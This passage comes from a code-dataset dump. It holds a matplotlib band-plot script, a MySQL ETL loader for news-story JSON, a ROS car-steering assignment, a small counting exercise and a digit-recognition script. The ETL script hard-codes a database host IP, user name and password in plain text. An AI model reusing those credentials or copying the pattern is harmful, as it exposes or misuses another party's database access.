antialiased=False.\n\nAlso demonstrates using the LinearLocator and custom formatting for the\nz axis tick labels.\n'''\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport matplotlib.mlab as mlab\nimport numpy as np\n\npaths = np.loadtxt(\"path.txt\", dtype='string')\nloadPath = paths[0]\nsavePath = paths[1]\n\nextensionTypes = [\".pdf\",\".png\"]\n\ndim = (np.size(np.loadtxt(loadPath + \"band0.txt\", delimiter=\",\")[0])-3)/2\nspaceLabel = [\"\"]\n\nspinLabel = [\"spinUp\",\"spinDown\"]\n\nBrlldata = np.array([np.transpose(np.loadtxt(loadPath + \"band\"+ str(bandNum)+\".txt\", delimiter=\",\")) for bandNum in range(dim)])\n\n#################################################################################################################################################################################################\n\nfigDensity = plt.figure(\"Density Plot\", figsize=plt.figaspect(1))\nplt.subplots_adjust(hspace = 0, wspace = 0,left=0.02,bottom=0.02,top=.98,right=.98)\nrowI=0\nfor spaceI in range(len(spaceLabel)):\n for spinI in range(len(spinLabel)):\n stateI = len(spinLabel)*spaceI+spinI\n for band in range(dim):\n axDensity = figDensity.add_subplot(dim,dim,stateI*dim+band+1)\n axDensity.set_xticks([])\n axDensity.set_yticks([])\n densityPlot = axDensity.tricontourf(Brlldata[band][0],Brlldata[band][1],Brlldata[band][(stateI%2)*len(spaceLabel)+spaceI+3], norm=plt.Normalize(vmax=1, vmin=0))\n rowI+=1\nfor ext in extensionTypes:\n figDensity\n plt.savefig(savePath+\"state/allDensity\"+ext)\n#################################################################################################################################################################################################\n\nfigPhase = plt.figure(\"Phase Plot\", figsize=plt.figaspect(1))\nplt.subplots_adjust(hspace = 0, wspace = 0,left=0.02,bottom=0.02,top=.98,right=.98)\nrowI=0\nfor spaceI in range(len(spaceLabel)):\n for spinI in range(len(spinLabel)):\n stateI = len(spinLabel)*spaceI+spinI\n for band in range(dim):\n axPhase = figPhase.add_subplot(dim,dim,stateI*dim +band+1)\n axPhase.set_xticks([])\n axPhase.set_yticks([])\n phasePlot = axPhase.tricontourf(Brlldata[band][0],Brlldata[band][1],Brlldata[band][(stateI%2)*len(spaceLabel)+spaceI+3+dim], norm=plt.Normalize(vmax=np.pi, vmin=-np.pi))\n rowI+=1\nfor ext in extensionTypes:\n figPhase\n plt.savefig(savePath+\"state/allPhase\"+ext)\n#################################################################################################################################################################################################\n#Saving\n\n\n#################################################################################################################################################################################################\n\nplt.show()\n","sub_path":"kSpace/normal/Plot/colorMaps/statePlotBlock.py","file_name":"statePlotBlock.py","file_ext":"py","file_size_in_byte":3167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"218621419","text":"import mysql.connector\nimport requests \nimport json\n\nmydb = mysql.connector.connect(\n host=\"35.240.248.249\",\n user=\"kumparanGuest\",\n passwd=\"guestForKumparan\"\n)\nmycursor = mydb.cursor()\nmycursor.execute(\"CREATE DATABASE IF NOT EXISTS 20190225_Kurniawan_Kesuma_Putra\")\nmycursor.close()\n\nmydb = mysql.connector.connect(\n host=\"35.240.248.249\",\n user=\"kumparanGuest\",\n passwd=\"guestForKumparan\",\n database = \"20190225_Kurniawan_Kesuma_Putra\"\n)\n\ncreate_table_list = [\n\"\"\"CREATE TABLE IF NOT EXISTS stories \n (\n story_id varchar(255) primary key, \n created_date text, \n updated_date text,\n published_date text,\n datatype varchar(255), \n author_group varchar(255),\n author_id varchar(255),\n editor_id varchar(255),\n is_adult_content tinyint(1),\n lead_text text,\n location_latitude int,\n location_longitude int,\n location_name varchar(255),\n slug text,\n status varchar(255),\n title text,\n type varchar(255),\n meta_description text\n )\"\"\",\n\"\"\"CREATE TABLE IF NOT EXISTS story_editor \n (\n story_id varchar(255),\n editor_id varchar(255)\n )\"\"\",\n\"\"\"CREATE TABLE IF NOT EXISTS polling_choices \n ( \n story_id VARCHAR(255), \n choices_index INT,\n image VARCHAR(255),\n selected TINYINT(1),\n stats INT,\n text TEXT\n )\"\"\",\n\"\"\"CREATE TABLE IF NOT EXISTS story_polling \n ( \n story_id VARCHAR(255), \n date_start text,\n date_end text,\n question_text TEXT,\n question_cover VARCHAR(255),\n hide_results TINYINT(1),\n is_multiple TINYINT(1),\n other_manual TINYINT(1)\n )\"\"\",\n\"\"\"CREATE TABLE IF NOT EXISTS story_lead_media \n ( \n story_id VARCHAR(255), \n lead_media_type VARCHAR(155),\n lead_media_url TEXT\n )\"\"\",\n\"\"\"CREATE TABLE IF NOT EXISTS story_topic \n ( \n story_id VARCHAR(255), \n topic_id VARCHAR(255),\n row_num INT auto_increment,\n unique(row_num)\n )\"\"\" \n]\n\n#create table in mysql server\nfor item in create_table_list:\n mycursor = mydb.cursor()\n mycursor.execute(item)\n mycursor.close()\n\n#get file in url\nr = requests.get(\"https://storage.googleapis.com/kumparan-public-bucket/bi_engineer_test/BI_Engineer.json\")\njson_obj = json.loads(r.text)\n\n#insert value into stories\nqrys = []\n\nfor item in json_obj:\n story_id = item['_key']\n created_date = item['date']['create']\n updated_date = item['date']['update']\n published_date = item['date']['publish']\n datatype = item['datatype']\n author_group = item['author']['group']\n author_id = item['author']['id']\n if item['editor']:\n editor_id = item['editor']['id']\n else:\n editor_id = None\n if 'adultContent' in item[\"is\"]:\n is_adult_content = item['is']['adultContent']\n else:\n is_adult_content = None\n lead_text = item['lead_text']['content']\n if item['location']:\n location_latitude = item['location']['lat']\n location_longitude = item['location']['lng']\n location_name = item['location']['name']\n else:\n location_latitude = None\n location_longitude = None\n location_name = None\n slug = item['slug']\n status = item['status']\n title = item['title']\n type = item['type']\n if item['meta']:\n meta_description = item['meta']['description']\n else:\n meta_description = None\n qry = (story_id, created_date, updated_date, published_date, datatype, author_group, author_id, editor_id, is_adult_content, lead_text, location_latitude, location_longitude, location_name, slug, status, title, type, meta_description)\n qrys.append(qry)\n\ncurr = mydb.cursor()\ncurr.execute(\"TRUNCATE stories\")\ncurr.close()\n\ncursor = mydb.cursor()\nstmt = \"INSERT INTO stories (story_id, created_date, updated_date, published_date, datatype, author_group, author_id, editor_id, is_adult_content, lead_text, location_latitude, location_longitude, location_name, slug, status, title, type, meta_description) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\ncursor.executemany(stmt, qrys)\nmydb.commit()\ncursor.close()\n\n#insert value into story_editor\nqrys = []\n\nfor item in json_obj:\n if 'editors' in item:\n story_id = item['_key']\n if item['editors']: #insert only story_id that have editor_id\n for x in item['editors']:\n story_editor = x\n qry = (story_id, story_editor)\n qrys.append(qry)\n\ncurr = mydb.cursor()\ncurr.execute(\"TRUNCATE story_editor\")\ncurr.close()\n\ncursor = mydb.cursor()\nstmt = \"INSERT INTO story_editor (story_id, editor_id) VALUES (%s, %s)\"\ncursor.executemany(stmt, qrys)\nmydb.commit()\ncurr.close()\n\n#insert into story_topic\nqrys = []\n\nfor item in json_obj:\n story_id = item['_key']\n if 'topics' in item['labels']:\n if len(item['labels']['topics'])==1:\n topics_id = item['labels']['topics'][0]\n else:\n topics_id = ','.join(item['labels']['topics'])\n else:\n topics_id = None\n qry = (story_id, topics_id)\n qrys.append(qry)\n\ncurr = mydb.cursor()\ncurr.execute(\"TRUNCATE story_topic\")\ncurr.close()\n\ncursor = mydb.cursor()\nstmt = \"INSERT INTO story_topic (story_id, topic_id) VALUES (%s, %s)\"\ncursor.executemany(stmt, qrys)\nmydb.commit()\ncursor.close()\n\n#insert into story_lead_media\nqrys = []\n\nfor item in json_obj:\n story_id = item['_key']\n if item['lead_media']: #check if lead_media not nul\n lead_media_type = item['lead_media']['type'] #assign lead_media_type\n if item['lead_media'] != None: #check lead_media, if null data will be ignored\n if 'urls' in item['lead_media']:#check if there urls key in lead_media\n for x in item['lead_media']['urls']: #assign lead_media_url\n lead_media_url = x \n qry=(story_id,lead_media_type,lead_media_url)\n qrys.append(qry)\n else: #if there is no ulrs key in lead_media\n lead_media_url = item['lead_media']['external_url']\n qry=(story_id,lead_media_type,lead_media_url)\n qrys.append(qry)\n\n\ncurr = mydb.cursor()\ncurr.execute(\"TRUNCATE story_lead_media\")\ncurr.close()\n\ncursor = mydb.cursor()\nstmt = \"INSERT INTO story_lead_media (story_id, lead_media_type, lead_media_url) VALUES (%s, %s, %s)\"\ncursor.executemany(stmt, qrys)\nmydb.commit()\ncursor.close()\n\n#insert value into story_polling\nqrys = []\n\nfor item in json_obj:\n story_id = item['_key']\n if item['polling']:\n date_start = item['polling']['date']['start']\n date_end = item['polling']['date']['end']\n question_text = item['polling']['question']['text']\n question_cover = item['polling']['question']['cover']\n hide_result = item['polling']['settings']['hideResult']\n is_multiple = item['polling']['settings']['isMultiple']\n other_manual = item['polling']['settings']['otherManual']\n qry = (story_id, date_start, date_end, question_text, question_cover,hide_result, is_multiple,other_manual)\n qrys.append(qry)\ncurr = mydb.cursor()\ncurr.execute(\"TRUNCATE story_polling\")\ncurr.close()\n\ncursor = mydb.cursor()\nstmt = \"INSERT INTO story_polling (story_id, date_start, date_end,question_text,question_cover,hide_results,is_multiple,other_manual) VALUES (%s, %s, %s, %s, %s, %s, %s, %s)\"\ncursor.executemany(stmt, qrys)\nmydb.commit()\ncursor.close()\n\n#insert value into polling_choices\nqrys = []\n\nfor item in json_obj:\n story_id = item['_key']\n if item['polling']:\n for x in range(len(item['polling']['choices'])):\n x = x+1\n choices_index = x\n x = str(x)\n if item['polling']['choices'][x]['image']:\n image = item['polling']['choices'][x]['image']\n else:\n image = None\n if 'selected' in item['polling']['choices'][x]:\n if item['polling']['choices'][x]['selected']:\n selected = 1\n else:\n selected = 0\n else:\n selected = None \n if item['polling']['choices'][x]['stats']:\n stats = item['polling']['choices'][x]['stats']\n else:\n stats = None \n if item['polling']['choices'][x]['text']:\n text = item['polling']['choices'][x]['text']\n else:\n text = None\n qry = (story_id,choices_index,image,selected,stats,text)\n qrys.append(qry)\n\ncurr = mydb.cursor()\ncurr.execute(\"TRUNCATE polling_choices\")\ncurr.close()\n\ncursor = mydb.cursor()\nstmt = \"INSERT INTO polling_choices (story_id, choices_index, image,selected,stats,text) VALUES (%s, %s, %s, %s, %s, %s)\"\ncursor.executemany(stmt, qrys)\nmydb.commit()\ncursor.close()","sub_path":"python_etl.py","file_name":"python_etl.py","file_ext":"py","file_size_in_byte":8714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"171947834","text":"#!/usr/bin/env python\n\nimport rospy\nfrom math import sqrt, tan\nimport numpy as np\nfrom nav_msgs.msg import Odometry\n# https://github.com/AutoMiny/AutoMiny/tree/master/catkin_ws/src/autominy_msgs/msg\nfrom autominy_msgs.msg import SteeringPWMCommand, SpeedCommand, SteeringPWMCommand\n\n# --- helper function that just returns an list of lists of length n ---\ndef give_n_list(n):\n list = []\n for i in range(n):\n list.append([])\n return list\n\nclass CircleDriver:\n def __init__ (self):\n # [[x0,x1,x2,...],[y0,y1,y2,...],[z0,z1,z2,...]]\n self.coordinate_history = give_n_list(3)\n # used to keep track for calculating distance driven\n self.last_coordinate_seen = None\n rospy.init_node(\"assignment_5\", anonymous=True)\n # Subscriber gets gps from ceilings camera\n # topic for Subscriber /communication/gps/\n # TODO: enter correct ID\n self.gps_subscriber = rospy.Subscriber(\"/communication/gps/5\", Odometry, self.get_points, queue_size=10)\n # Subscriber to voltage information of motor\n self.steering_angle = rospy. Subscriber(\"/sensors/arduino/steering_angle\", SteeringPWMCommand, self.print_voltage, queue_size=10)\n # Pubisher publishes steering angle\n self.steer_publisher = rospy.Publisher(\"/actuators/steering_pwm\", SteeringPWMCommand,queue_size=10)\n self.steer_cmd = SteeringPWMCommand()\n # Publisher publishes speed\n self.speed_publisher = rospy.Publisher(\"/actuators/speed\", SpeedCommand, queue_size=10)\n self.speed_cmd = SpeedCommand()\n\n # The spin() keeps things going\n #rospy.spin()\n self.rate = rospy.Rate(10) # 10ghz\n\n # saves points received by the camera to tracking file\n def get_points(self, odo):\n self.coordinate_history[0].append(odo.pose.pose.position.x)\n self.coordinate_history[1].append(odo.pose.pose.position.y)\n self.coordinate_history[2].append(odo.pose.pose.position.z)\n #self.print_latest_coordinates()\n\n # prints voltage information of motor\n def print_voltage(self, pwm):\n #print(\"voltage: \" + str(pwm.value))\n pass\n\n # prints the most current coordinates received by ceiling camera\n def print_latest_coordinates(self):\n print( \"x:\" + str(self.coordinate_history[0][-1]))\n print( \"y:\" + str(self.coordinate_history[1][-1]))\n\n # gets the latest gps-coordinates from the history\n def get_latest_coordinates(self):\n return (self.coordinate_history[0][-1], self.coordinate_history[1][-1], self.coordinate_history[2][-1])\n\n # drives car in circle and meassures three points for each 1s\n def drive_circle(self, steering, speeding):\n point_list = []\n #starting position\n point_list.append(self.get_latest_coordinates())\n self.start_drive_in_circle(steering, speeding)\n self.short_stop_car()\n rospy.sleep(5)\n # 2nd point\n point_list.append(self.get_latest_coordinates())\n self.short_stop_car()\n # 3rd point\n point_list.append(self.get_latest_coordinates())\n return point_list\n\n def start_drive_in_circle(self, steering, speeding):\n self.steer_cmd.value = steering\n self.speed_cmd.value = speeding\n self.steer_publisher.publish(self.steer_cmd)\n self.speed_publisher.publish(self.speed_cmd)\n\n\n def short_stop_car(self):\n cur = self.speed_cmd.value\n self.speed_cmd.value = 0\n self.speed_publisher.publish(self.speed_cmd)\n rospy.sleep(5)\n self.speed_cmd.value = 0.5\n self.speed_publisher.publish(self.speed_cmd)\n\n def stop_driving_circle(self):\n self.speed_cmd.value = 0\n self.steer_cmd.value = 0\n self.steer_publisher.publish(self.steer_cmd)\n self.speed_publisher.publish(self.speed_cmd)\n\n def reset_coord_history(self):\n self.coordinate_history = give_n_list(3)\n\n def update_distance_traveled(self):\n while len(self.coordinate_history) > 0:\n old_coordinate = self.last_coordinate_seen\n new_coordinate = self.coordinate_history[0]\n del(self.coordinate_history[0])\n # distance = sqrt((x1-x0)^2 + (y1-y0)^2)\n distance = sqrt((new_coordinate[0] - old_coordinate[0])**2 + (new_coordinate[1] - old_coordinate[1])**2)\n self.last_coordinate_seen = new_coordinate\n\n\n def drive_distance_in_circle(self, distance):\n self.reset_coord_history()\n distance_traveled = 0\n while(distance_traveled < distance):\n self.update_distance_traveled()\n self.stop_driving_circle()\n\n # Ackerman steering\n # ai = tan(wheelbase/(radius - track/2))^-1\n # a0 = tan(wheelbase/(radius + track/2))^-1\n # angle = (ai -a0)/2 + a0\n # http://datagenetics.com/blog/december12016/index.html\n def calculate_steering_anlge(wheelbase, track, radius):\n ai = tan(wheelbase/(radius - track/2))**-1\n a0 = tan(wheelbase/(radius + track/2))**-1\n return (ai - a0)/2 +a0\n\n def calculate_turning_radius(point0, point1, point2):\n x0 = point0[0]\n y0 = point0[1]\n x1 = point1[0]\n y1 = point1[1]\n x2 = point2[0]\n y2 = point2[1]\n\n a = np.array([[2*(x1-x0), 2*(y1-y0)], [2*(x2-x0), 2*(y2-y0)]])\n b = np.array([(x1**2 - x0**2) - (y1**2 - y0**2), (x2**2 - x0**2) -(y2**2-y0**2)])\n result = np.linalg.solve(a,b)\n x = result[0]\n y = result[1]\n\n r = sqrt(x**2 - 2*x*x0 + x0**2 + y**2 - 2*y*y0 +y0**2)\n return r\n\n\n steering_angles = (-1,0,1)\n\nif __name__ == '__main__':\n\n # --- find out the radius here by driving and taking three random point measssurements to calculate circle radius --- #\n cdriver = CircleDriver()\n print(\"taking meassurement points\")\n rospy.sleep(2)\n meassured_points = cdriver.drive_circle(1,0.3)\n rospy.sleep(5)\n print(\"3 points meassuered: \" + str(meassured_points))\n cdriver.stop_driving_circle()\n r = calculate_turning_radius(meassured_points[0], meassured_points[1], meassured_points[2])\n print(\"radius: \" + str(r))\n print(\"first:\" + str(cdriver.coordinate_history[0][0]))\n print(\"middle:\" + str(cdriver.coordinate_history[0][len(cdriver.coordinate_history[0])/2]))\n print(\"last:\" + str(cdriver.coordinate_history[0][-1]))\n\n # drive half a circle by using radius\n distance_half_circle = (numpy.pi * 2 * r)/2\n cdriver.drive_distance_in_circle(distance_half_circle)\n\n if drive_half_circle:\n rospy.sleep(5)\n","sub_path":"src/assignment5/src/abgabe5_4.py","file_name":"abgabe5_4.py","file_ext":"py","file_size_in_byte":6564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"494133609","text":"n = int(input())\n\ns = input().split()\nnum = []\nfor i in range(n):\n s[i] = int(s[i])\n if s[i] not in num:\n num.append(s[i])\ncount = 0\nfor i in num:\n for j in num:\n if i - j == 1:\n count += 1\nprint(count)\n","sub_path":"Python/第1题/相邻数对.py","file_name":"相邻数对.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"615554109","text":"import sys\r\nfrom PIL import Image\r\nimport os\r\nfrom engineer.Algebra.linear import matrix\r\nimport matplotlib.pyplot as plt\r\n\r\nclass mnum:\r\n def __init__(self, minx, maxx, miny, maxy, A):\r\n self.minx = minx\r\n self.maxx = maxx\r\n self.maxy = maxy\r\n self.miny = miny\r\n self.w = A.m\r\n self.h = A.n\r\n self.A = A\r\n\r\ndef surr0(A):\r\n temp = matrix(A.n+2, A.m+2)\r\n for i in range(A.n):\r\n for j in range(A.m):\r\n temp[i+1][j+1] = A[i][j]\r\n return temp\r\n\r\ndef unsurr(A):\r\n temp = matrix(A.n-2,A.m-2)\r\n for i in range(1,A.n-1):\r\n for j in range(1,A.m-1):\r\n temp[i-1][j-1] = A[i][j]\r\n return temp\r\n\r\ndef through(A, check, x, y, maxx, minx, maxy, miny):\r\n sum = 4\r\n if A[y][x] == 2:\r\n miny = -2\r\n while sum != 0:\r\n sum = 0\r\n if A[y-1][x] != 0 and check[y-1][x] == 0:\r\n if y-1 < miny:\r\n miny = y-1\r\n sum += 1\r\n check[y - 1][x] = 1\r\n check, maxx, minx, maxy, miny = through(A, check, x, y - 1, maxx, minx, maxy, miny)\r\n if A[y+1][x] != 0 and check[y+1][x] == 0:\r\n if y+1 > maxy:\r\n maxy = y+1\r\n sum += 1\r\n check[y + 1][x] = 1\r\n check, maxx, minx, maxy, miny = through(A, check, x, y + 1, maxx, minx, maxy, miny)\r\n if A[y][x-1] != 0 and check[y][x-1] == 0:\r\n if x-1 < minx:\r\n minx = x-1\r\n sum += 1\r\n check[y][x-1] = 1\r\n check, maxx, minx, maxy, miny = through(A, check, x-1, y, maxx, minx, maxy, miny)\r\n if A[y][x+1] != 0 and check[y][x+1] == 0:\r\n if x+1 > maxx:\r\n maxx = x+1\r\n sum += 1\r\n check[y][x+1] = 1\r\n check, maxx, minx, maxy, miny = through(A, check, x+1, y, maxx, minx, maxy, miny)\r\n if A[y + 1][x + 1] != 0 and check[y + 1][x + 1] == 0:\r\n if x + 1 > maxx:\r\n maxx = x + 1\r\n if y + 1 > maxy:\r\n maxy = y + 1\r\n sum += 1\r\n check[y + 1][x + 1] = 1\r\n check, maxx, minx, maxy, miny = through(A, check, x + 1, y + 1, maxx, minx, maxy, miny)\r\n if A[y - 1][x - 1] != 0 and check[y - 1][x - 1] == 0:\r\n if x - 1 < minx:\r\n minx = x - 1\r\n if y - 1 < miny:\r\n miny = y - 1\r\n sum += 1\r\n check[y - 1][x - 1] = 1\r\n check, maxx, minx, maxy, miny = through(A, check, x - 1, y - 1, maxx, minx, maxy, miny)\r\n if A[y + 1][x - 1] != 0 and check[y + 1][x - 1] == 0:\r\n if x - 1 < minx:\r\n minx = x - 1\r\n if y + 1 > maxy:\r\n maxy = y + 1\r\n sum += 1\r\n check[y + 1][x - 1] = 1\r\n check, maxx, minx, maxy, miny = through(A, check, x - 1, y + 1, maxx, minx, maxy, miny)\r\n if A[y - 1][x + 1] != 0 and check[y - 1][x + 1] == 0:\r\n if x + 1 > maxx:\r\n maxx = x + 1\r\n if y - 1 < miny:\r\n miny = y - 1\r\n sum += 1\r\n check[y - 1][x + 1] = 1\r\n check, maxx, minx, maxy, miny = through(A, check, x + 1, y - 1, maxx, minx, maxy, miny)\r\n\r\n return check, maxx, minx, maxy, miny\r\n\r\ndef dim(A,x,y, check):\r\n check, maxx, minx, maxy, miny = through(A, check, x, y,x,x,y,y)\r\n return minx, maxx, miny, maxy, check\r\n\r\ndef intersectiony(A):\r\n ints = []\r\n for i in range(A.m):\r\n curr = A[0][i]\r\n if A.n == 1:\r\n ints.append(1)\r\n else:\r\n count = 0\r\n if curr == 1: count += 1\r\n for j in range(A.n):\r\n temp = A[j][i]\r\n if temp > curr:\r\n count += 1\r\n curr = A[j][i]\r\n\r\n ints.append(count)\r\n return ints\r\n\r\ndef intersectionx(A):\r\n return intersectiony(A.t())\r\n\r\ndef isMinus(A):\r\n intx = intersectionx(A)\r\n inty = intersectiony(A)\r\n for i in intx:\r\n if i > 1:\r\n return False\r\n for i in inty:\r\n if i > 1:\r\n return False\r\n return True\r\n\r\ndef isZero(A):\r\n intx = intersectionx(A)\r\n inty = intersectiony(A)\r\n # FIRST TEST CHECK NUMBER OF INTERSECTIONS OF HORIZONTAL AND VERTICAL LINES\r\n intcheckx = []\r\n intchecky = []\r\n test = [1,2,1]\r\n for i in intx:\r\n if not intcheckx:\r\n intcheckx.append(i)\r\n elif i != intcheckx[-1]:\r\n intcheckx.append(i)\r\n for i in inty:\r\n if not intchecky:\r\n intchecky.append(i)\r\n elif i != intchecky[-1]:\r\n intchecky.append(i)\r\n if intcheckx != test or intchecky != test:\r\n return False\r\n\r\n # SECOND TEST, SEE WEATHER IT CAN COMPLETE A ROTATION\r\n curr = A[0][0]\r\n x = 0\r\n y = 0\r\n while x < A.m:\r\n y = 0\r\n while y < A.n:\r\n if curr == 1:\r\n break\r\n y = y + 1\r\n curr = A[y][x]\r\n if curr == 1:\r\n break\r\n x = x + 1\r\n run = True\r\n check = matrix(A.n, A.m)\r\n xc = x\r\n temp = A.copy()\r\n try:\r\n while A[y][xc] != 0:\r\n temp[y][xc] = 2\r\n xc += 1\r\n except IndexError:\r\n return False\r\n\r\n # break the next layer and iterate through, if anything touches the 2's we have a circle\r\n # 6, 8, 9 would supposedly pass as well but they don't pass the first test\r\n xs = 0\r\n ys = 0\r\n for i in range(x, xc):\r\n if A[y-1][i] == 1:\r\n xc2 = i\r\n while A[y-1][xc2] != 0:\r\n temp[y-1][xc2] = 0\r\n if temp[y-2][xc2] != 0:\r\n xs = xc2\r\n ys = y-2\r\n xc2 += 1\r\n break\r\n\r\n temp = surr0(temp)\r\n check = surr0(check)\r\n check,_,_,_,two = through(temp, check, xs, ys, 0, 0, 0, 0)\r\n if two == -2:\r\n return True\r\n return False\r\n\r\ndef isOne(A):\r\n t = A.copy()\r\n h = t.n\r\n no = int(0.2*h)\r\n t = matrix(t.A[no:])\r\n t = matrix(t.A[:t.n-no])\r\n ll, _ = leftLaser(t)\r\n if ll[0] == 0:\r\n return False\r\n for i in ll:\r\n if i != ll[0]:\r\n return False\r\n ll, _ = rightLaser(t)\r\n for i in ll:\r\n if i != ll[0]:\r\n return False\r\n return True\r\n\r\ndef isEight(A):\r\n intx = intersectionx(A)\r\n count = 0\r\n for i in range(len(intx)-1):\r\n if intx[i+1] == 2:\r\n intx[i] = 0\r\n elif intx[i] == 1:\r\n intx[i] = 0\r\n intx[-1] = 0\r\n if sum(intx,0) != 4:\r\n return False\r\n xy = []\r\n for i in range(len(intx)):\r\n if intx[i] == 2:\r\n start = False\r\n for j in range(len(A[i])):\r\n if A[i][j] == 1:\r\n start = True\r\n if start and A[i][j] == 0:\r\n xy.append([j,i])\r\n break\r\n\r\n check = matrix(A.n, A.m)\r\n temp = matrix(A.n, A.m)\r\n for i in range(A.n):\r\n for j in range(A.m):\r\n if A[i][j] == 1: temp[i][j] = 0\r\n else: temp[i][j] = 1\r\n check, _, _, _, _ = through(surr0(temp), surr0(check), 1, 1, 0, 0, 0, 0)\r\n check, _, _, _, _ = through(surr0(temp), check, 1, A.n, 0, 0, 0, 0)\r\n check, _, _, _, _ = through(surr0(temp), check, A.m, 1, 0, 0, 0, 0)\r\n check, _, _, _, _ = through(surr0(temp), check, A.m, A.n, 0, 0, 0, 0)\r\n\r\n if check[xy[0][1]+1][xy[0][0]+1] != 0:\r\n return False\r\n if check[xy[1][1]+1][xy[1][0]+1] != 0:\r\n return False\r\n\r\n return True\r\n\r\ndef fill(A, check, x, y):\r\n sum = 4\r\n while sum != 0:\r\n sum = 0\r\n if A[y - 1][x] != 0 and check[y - 1][x] == 0:\r\n sum += 1\r\n check[y - 1][x] = 1\r\n check = fill(A, check, x, y - 1)\r\n if A[y + 1][x] != 0 and check[y + 1][x] == 0:\r\n sum += 1\r\n check[y + 1][x] = 1\r\n check = fill(A, check, x, y + 1)\r\n if A[y][x - 1] != 0 and check[y][x - 1] == 0:\r\n sum += 1\r\n check[y][x - 1] = 1\r\n check = fill(A, check, x - 1, y)\r\n if A[y][x + 1] != 0 and check[y][x + 1] == 0:\r\n sum += 1\r\n check[y][x + 1] = 1\r\n check = fill(A, check, x + 1, y)\r\n\r\n if A[y + 1][x + 1] != 0 and check[y + 1][x + 1] == 0:\r\n sum += 1\r\n check[y + 1][x + 1] = 1\r\n check = fill(A, check, x + 1, y + 1)\r\n if A[y - 1][x - 1] != 0 and check[y - 1][x - 1] == 0:\r\n sum += 1\r\n check[y - 1][x - 1] = 1\r\n check = fill(A, check, x - 1, y - 1)\r\n if A[y + 1][x - 1] != 0 and check[y + 1][x - 1] == 0:\r\n sum += 1\r\n check[y + 1][x - 1] = 1\r\n check = fill(A, check, x - 1, y + 1)\r\n if A[y - 1][x + 1] != 0 and check[y - 1][x + 1] == 0:\r\n sum += 1\r\n check[y - 1][x + 1] = 1\r\n check = fill(A, check, x + 1, y - 1)\r\n\r\n return check\r\n\r\ndef fillout(A, x=1, y=1):\r\n temp = surr0(A)\r\n for i in range(temp.n):\r\n for j in range(temp.m):\r\n if temp[i][j] == 1:\r\n temp[i][j] = 0\r\n else:\r\n temp[i][j] = 1\r\n temp = surr0(temp)\r\n\r\n check = matrix(temp.n,temp.m)\r\n\r\n check = fill(temp, check, x, y)\r\n return unsurr(unsurr(check))\r\n\r\ndef isolate(mat):\r\n check = matrix(mat.n, mat.m)\r\n k = 0\r\n for i in range(mat.n):\r\n for j in range(mat.m):\r\n if mat[i][j] != 0 and check[i][j] == 0:\r\n minx, maxx, miny, maxy, check = dim(mat,j,i, check)\r\n if minx-maxx != 0 :\r\n k += 1\r\n temp = matrix(mat[miny:maxy+1]).t()\r\n temp = matrix(temp[minx:maxx+1]).t()\r\n yield minx, maxx, miny, maxy, temp\r\n\r\ndef matrify(img):\r\n w, h = img.size\r\n px = img.load()\r\n mat = matrix(h, w)\r\n for i in range(h):\r\n for j in range(w):\r\n if (255, 255, 255, 255) != px[j, i] \\\r\n and (242, 242, 242, 255) != px[j, i] \\\r\n and (238, 238, 238, 255) != px[j, i]:\r\n mat[i][j] = 1\r\n return mat\r\n\r\ndef scalex(A, n):\r\n S = []\r\n for i in A.A:\r\n if 0 not in i or 1 not in i:\r\n S.append(i*n)\r\n else:\r\n s = []\r\n for j in i:\r\n s += [j]*n\r\n S.append(s)\r\n return matrix(S)\r\n\r\ndef scaley(A,n):\r\n return scalex(A.t(), n).t()\r\n\r\ndef leftLaser(A):\r\n x = [-1 for i in range(A.n)]\r\n for i in range(A.n):\r\n for j in range(A.m):\r\n if A[i][j] == 1:\r\n x[i] = j\r\n break\r\n u = [-7]\r\n y = [i for i in reversed(range(len(x)))]\r\n aveth = 0\r\n for i in A.A:\r\n aveth += sum(i,0)/A.n/3\r\n\r\n\r\n xx = []\r\n for i in x:\r\n if i <= aveth:\r\n xx.append(0)\r\n if u[-1] != 'L':\r\n u.append('L')\r\n elif i >= 2*aveth:\r\n xx.append(2)\r\n if u[-1] != 'H':\r\n u.append('H')\r\n else:\r\n xx.append(1)\r\n if u[-1] != 'M':\r\n u.append('M')\r\n u= u[1:]\r\n return x, u\r\n\r\ndef rightLaser(A):\r\n temp = A.copy()\r\n for i in range(A.n):\r\n temp.A[i] = [j for j in reversed(temp.A[i])]\r\n return leftLaser(temp)\r\n\r\ndef number(A, heh):\r\n rl, ru = rightLaser(A)\r\n ll, lu = rightLaser(A)\r\n if isMinus(A):\r\n print('-')\r\n if isOne(A):\r\n print(1)\r\n if isZero(A):\r\n print(0)\r\n if lu == ['H','M','L','M','H'] and not isZero(A):\r\n print(6)\r\n if ru == ['H','L','M','H'] or ru == ['L','M','H']:\r\n print(7)\r\n\r\n if ru == ['H','M','L','M','H'] and not isZero(A):\r\n print(9)\r\n if isEight(A):\r\n print(8)\r\n\r\ndef matsum(A):\r\n temp = 0\r\n for i in range(A.n):\r\n for j in range(A.m):\r\n temp += A[i][j]\r\n return temp\r\n\r\ndef lineV(A):\r\n \"\"\"\r\n boolean function\r\n :param A: A matrix of a number\r\n :return: returns True if there is a line that goes from highest to lowest point\r\n \"\"\"\r\n for i in range(A.m):\r\n if A[-1][i] == 1:\r\n j = A.n-1\r\n while j > 0:\r\n if A[j][i] == 0:\r\n break\r\n else:\r\n j -= 1\r\n if j == 0:\r\n return True\r\n return False\r\n\r\n\r\n\r\n\r\nif __name__ ==\"__main__\":\r\n currdir = os.path.realpath(__file__)\r\n\r\n img2 = Image.open('matrixEx.PNG')\r\n mat2 = matrify(img2)\r\n nums2 = []\r\n for minx, maxx, miny, maxy, A in isolate(mat2):\r\n nums2.append(mnum(minx, maxx, miny, maxy, A))\r\n\r\n img = Image.open('matrixEx2.PNG')\r\n mat = matrify(img)\r\n nums = []\r\n for minx, maxx, miny, maxy, A in isolate(mat):\r\n nums.append(mnum(minx, maxx, 